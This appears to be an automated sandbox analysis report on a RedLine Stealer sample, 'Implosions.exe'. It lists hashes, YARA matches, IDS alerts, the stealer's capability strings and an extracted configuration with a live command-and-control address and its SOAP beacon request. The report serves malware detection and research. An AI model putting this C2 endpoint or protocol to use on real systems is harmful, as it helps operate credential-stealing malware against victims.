Windows Analysis Report
Implosions.exe

Overview

General Information

Sample name: Implosions.exe
Analysis ID: 1505369
MD5: aeed85e8a5b1d2013ea6fa0348e954d7
SHA1: 899fc5632fce363d0dd1f05bb388f0f3f27240c2
SHA256: 5b1d458a558dbe702742407f213b8a38241555bbded345b0f7c46529b938b3a3
Tags: exe, redlinestealer

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Implosions.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\Implosions.exe" MD5: AEED85E8A5B1D2013EA6FA0348E954D7)
    • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
RedLine Stealer | RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["109.234.38.212:6677"], "Bot Id": "russianhack"}
Source | Rule | Description | Author | Strings
Implosions.exe | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 02 88 44 24 2B 88 44 24 2F B0 BB 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
Source | Rule | Description | Author | Strings
00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
      • 0x126f7:$a4: get_ScannedWallets
      • 0x121a0:$a5: get_ScanTelegram
      • 0x122b6:$a6: get_ScanGeckoBrowsersPaths
      • 0x12402:$a7: <Processes>k__BackingField
      • 0x117ae:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
      • 0x11f9f:$a9: <ScanFTP>k__BackingField
      00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
      • 0x11f45:$u7: RunPE
      • 0x11f4b:$u8: DownloadAndEx
      • 0x189d8:$pat14: , CommandLine:
      • 0x116cb:$v2_1: ListOfProcesses
      • 0x1210c:$v2_2: get_ScanBrowsers
      • 0x1214a:$v2_2: get_ScanFTP
      • 0x12162:$v2_2: get_ScanWallets
      • 0x12182:$v2_2: get_ScanScreen
      • 0x121a0:$v2_2: get_ScanTelegram
      • 0x121c2:$v2_2: get_ScanVPN
      • 0x121da:$v2_2: get_ScanSteam
      • 0x121f6:$v2_2: get_ScanDiscord
      • 0x1227e:$v2_2: get_ScanChromeBrowsersPaths
      • 0x122b6:$v2_2: get_ScanGeckoBrowsersPaths
      • 0x126f7:$v2_2: get_ScannedWallets
      • 0x119e4:$v2_3: GetArguments
      • 0x11a0e:$v2_4: VerifyUpdate
      • 0x119f1:$v2_5: VerifyScanRequest
      • 0x11a03:$v2_6: GetUpdates
      • 0x1713b:$v2_6: GetUpdates
      • 0x10093:$v4_3: base64str
      00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
        Source | Rule | Description | Author | Strings
        0.0.Implosions.exe.400000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
        • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x700:$s3: 83 EC 38 53 B0 02 88 44 24 2B 88 44 24 2F B0 BB 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1e9d0:$s5: delete[]
        • 0x1de88:$s6: constructor or from DllMain.
        0.2.Implosions.exe.34e0190.6.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
          0.2.Implosions.exe.34e0190.6.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
            0.2.Implosions.exe.34e0190.6.unpack | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
            • 0x108f7:$a4: get_ScannedWallets
            • 0x103a0:$a5: get_ScanTelegram
            • 0x104b6:$a6: get_ScanGeckoBrowsersPaths
            • 0x10602:$a7: <Processes>k__BackingField
            • 0xf9ae:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
            • 0x1019f:$a9: <ScanFTP>k__BackingField
            0.2.Implosions.exe.34e0190.6.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
            • 0x10145:$u7: RunPE
            • 0x1014b:$u8: DownloadAndEx
            • 0x16bd8:$pat14: , CommandLine:
            • 0xf8cb:$v2_1: ListOfProcesses
            • 0x1030c:$v2_2: get_ScanBrowsers
            • 0x1034a:$v2_2: get_ScanFTP
            • 0x10362:$v2_2: get_ScanWallets
            • 0x10382:$v2_2: get_ScanScreen
            • 0x103a0:$v2_2: get_ScanTelegram
            • 0x103c2:$v2_2: get_ScanVPN
            • 0x103da:$v2_2: get_ScanSteam
            • 0x103f6:$v2_2: get_ScanDiscord
            • 0x1047e:$v2_2: get_ScanChromeBrowsersPaths
            • 0x104b6:$v2_2: get_ScanGeckoBrowsersPaths
            • 0x108f7:$v2_2: get_ScannedWallets
            • 0xfbe4:$v2_3: GetArguments
            • 0xfc0e:$v2_4: VerifyUpdate
            • 0xfbf1:$v2_5: VerifyScanRequest
            • 0xfc03:$v2_6: GetUpdates
            • 0x1533b:$v2_6: GetUpdates
            • 0xe293:$v4_3: base64str
            No Sigma rule has matched
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-06T06:37:01.472489+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 109.234.38.212 | 6677 | TCP
            2024-09-06T06:37:08.171917+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 109.234.38.212 | 6677 | TCP
            2024-09-06T06:37:14.780061+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 109.234.38.212 | 6677 | TCP
            2024-09-06T06:37:21.407768+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 109.234.38.212 | 6677 | TCP
            2024-09-06T06:37:28.035446+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 109.234.38.212 | 6677 | TCP
            2024-09-06T06:37:34.676824+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 109.234.38.212 | 6677 | TCP
            2024-09-06T06:37:41.518633+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 109.234.38.212 | 6677 | TCP
            2024-09-06T06:37:48.122852+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 109.234.38.212 | 6677 | TCP
            2024-09-06T06:37:54.780880+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49745 | 109.234.38.212 | 6677 | TCP
            2024-09-06T06:38:01.423282+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49746 | 109.234.38.212 | 6677 | TCP
            2024-09-06T06:38:09.056633+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49747 | 109.234.38.212 | 6677 | TCP
            2024-09-06T06:38:15.668068+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49748 | 109.234.38.212 | 6677 | TCP
            2024-09-06T06:38:22.284052+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49749 | 109.234.38.212 | 6677 | TCP
            2024-09-06T06:38:28.887423+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49750 | 109.234.38.212 | 6677 | TCP
            2024-09-06T06:38:35.564617+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 109.234.38.212 | 6677 | TCP
            2024-09-06T06:38:42.187989+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49752 | 109.234.38.212 | 6677 | TCP
            2024-09-06T06:38:48.816093+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 109.234.38.212 | 6677 | TCP
            2024-09-06T06:38:55.520218+0200 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49754 | 109.234.38.212 | 6677 | TCP

            AV Detection

            Source: Implosions.exe | Avira: detected
            Source: 0.2.Implosions.exe.34c6458.7.raw.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["109.234.38.212:6677"], "Bot Id": "russianhack"}
            Source: Implosions.exe | ReversingLabs: Detection: 71%
            Source: Implosions.exe | Virustotal: Detection: 53%
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: Implosions.exe | Joe Sandbox ML: detected
            Source: Implosions.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: Implosions.exe, 00000000.00000002.2909439586.000000000074B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2911841113.0000000005BB5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: nHC:\Windows\System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2909012790.0000000000197000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: o.pdbService source: Implosions.exe, 00000000.00000002.2909012790.0000000000197000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: _.pdb source: Implosions.exe, 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Implosions.exe, 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbys source: Implosions.exe, 00000000.00000002.2911841113.0000000005BB5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2909439586.0000000000705000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2911841113.0000000005BB5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: Implosions.exe, 00000000.00000002.2909439586.000000000077D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ServiceModel.pdbUN source: Implosions.exe, 00000000.00000002.2911841113.0000000005BD2000.00000004.00000020.00020000.00000000.sdmp

            Networking

            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49743 -> 109.234.38.212:6677
            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49742 -> 109.234.38.212:6677
            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49732 -> 109.234.38.212:6677
            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49731 -> 109.234.38.212:6677
            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49739 -> 109.234.38.212:6677
            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49730 -> 109.234.38.212:6677
            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49748 -> 109.234.38.212:6677
            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49741 -> 109.234.38.212:6677
            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49746 -> 109.234.38.212:6677
            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49750 -> 109.234.38.212:6677
            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49745 -> 109.234.38.212:6677
            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49752 -> 109.234.38.212:6677
            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49749 -> 109.234.38.212:6677
            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49753 -> 109.234.38.212:6677
            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49754 -> 109.234.38.212:6677
            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49747 -> 109.234.38.212:6677
            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49740 -> 109.234.38.212:6677
            Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49751 -> 109.234.38.212:6677
            Source: Malware configuration extractor | URLs: 109.234.38.212:6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 6677
            Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 6677
            Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 109.234.38.212:6677
            Source: global traffic | HTTP traffic detected:
              POST / HTTP/1.1
              Content-Type: text/xml; charset=utf-8
              SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
              Host: 109.234.38.212:6677
              Content-Length: 137
              Expect: 100-continue
              Accept-Encoding: gzip, deflate
              Connection: Keep-Alive
            Source: Joe Sandbox View | ASN Name: VDSINA-ASRU VDSINA-ASRU
            Source: unknown | TCP traffic detected without corresponding DNS query: 109.234.38.212
            Source: unknown | HTTP traffic detected:
              POST / HTTP/1.1
              Content-Type: text/xml; charset=utf-8
              SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
              Host: 109.234.38.212:6677
              Content-Length: 137
              Expect: 100-continue
              Accept-Encoding: gzip, deflate
              Connection: Keep-Alive
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000255A000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://109.234.38.212:6677
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://109.234.38.212:6677/
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000256E000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000255A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000256E000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000256E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/0
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectLR
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000255A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectT
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsLR
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesLR
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentLR
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
            Source: Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateLR
            Source: Implosions.exe, 00000000.00000002.2910742497.000000000268C000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910742497.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
            Source: Implosions.exe, 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Implosions.exe, 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
            Source: Implosions.exe, 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Implosions.exe, 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
            Source: Implosions.exe, 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, Implosions.exe, 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Implosions.exe, 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, Implosions.exe, 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%

            System Summary

            Source: Implosions.exe, type: SAMPLEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.0.Implosions.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.34e0190.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.34e0190.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.2280f6e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.2280f6e.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.2280086.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.2280086.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.50a0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.50a0000.8.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.2480ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.2480ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
